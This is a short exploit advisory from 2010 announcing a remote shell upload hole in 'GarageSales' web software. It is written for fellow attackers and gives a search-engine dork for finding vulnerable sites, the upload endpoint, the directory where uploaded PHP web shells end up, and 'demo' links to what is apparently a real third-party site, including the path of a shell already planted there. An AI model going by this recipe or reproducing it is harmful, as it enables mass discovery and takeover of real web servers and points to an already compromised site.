GarageSales suffers from a remote shell upload vulnerability.
bf840a495c50a9cf3cdb93d1f6184188ad17616d309be598440492a7328d3cf2
# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : cgd@hotmail.com
###################################################
| Intorduction :`|
Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p
###################################################
[Dork ]: inurl:post.php?Category=Garage
{exploit} : http://127.0.0.1/post.php?Category=Garage
(Demo) : http://www.jamaicasearch.net/searchgarage/post.php?Category=Garage
After you have uploaded your shells , you will find it in this Path : http://127.0.0.1/up_files/YouRShell.php
Demo : http://www.jamaicasearch.net/searchgarage/up_files/1269813788CrewSheLL.php
###################################################
Greetz To : All my friends :p , Dos02.com Team ,Moroccan H4x0rz
--=-=-=-=-Dos02.com , owned-m.com/cc , vid2all.com -=-=-=-=--=
________________________________
Hotmail : une messagerie fiable avec la protection anti-spam performante de Microsoft Inscrivez-vous<https://signup.live.com/signup.aspx?id=60969>